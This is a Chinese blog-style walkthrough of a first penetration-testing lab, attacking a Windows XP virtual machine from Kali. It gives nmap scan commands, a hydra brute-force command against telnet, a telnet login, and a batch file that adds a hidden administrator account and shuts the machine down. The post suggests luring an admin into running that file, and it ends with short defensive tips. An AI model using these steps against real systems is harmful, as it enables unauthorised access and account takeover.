IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 内网渗透(telnet爆破) -> 正文阅读

[系统运维]内网渗透(telnet爆破)


前言

第一次渗透实验


攻击机虚拟机kali:192.168.241.140

目标机虚拟机win xp:192.168.241.130

一、内网信息侦察

在毫无顾虑地情况下,可以直接发掘网段内存活主机

nmap -sP 192.168.241.0/24

(这里建议使用 -p0 可以绕过某些防火墙)

请添加图片描述
这里对192.168.241.130的主机进行渗透

nmap -sV 192.168.241.130

对该主机进行端口扫描(可加-Pn 无ping扫描)

请添加图片描述
机型为win xp,我直接对telnet进行爆破

二、telnet渗透

1.hydra

命令如下(示例):

hydra 192.168.241.130 -L user.txt -P pwd.txt telent

双字典爆破
请添加图片描述
这不有手就行?(

2.telnet远程登陆

命令如下(示例):

telnet 192.168.241.130
login:administrator
password:123

成功登入shell
请添加图片描述

三、提权

假如能直接登入管理员账号,那是最理想的情况,但没有的话,只能想方设法提权(社工,诱导等)。

C:\>whoami 

C:\>net user //查询存在用户名

C:\>copy con c:\123.bat
net user qq 111 /add
net localgroup administrator qq /add
shutdown -s -t 40 -c "1111"

这里在c盘目录写了个123的批处理文件,内容为创建qq这个用户,并升级为管理员用户,以及40s关机(关机写着玩的)
我们可以设法让管理员运行

请添加图片描述
预防:密码不要太简单、关闭不常用端口、尽量减少设备用户名、不运行来历不明的文件


总结

一个很简单的渗透实验,暑假闲来无事随便写写

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-07-28 08:14:35  更:2021-07-28 08:16:59 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 0:33:27-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码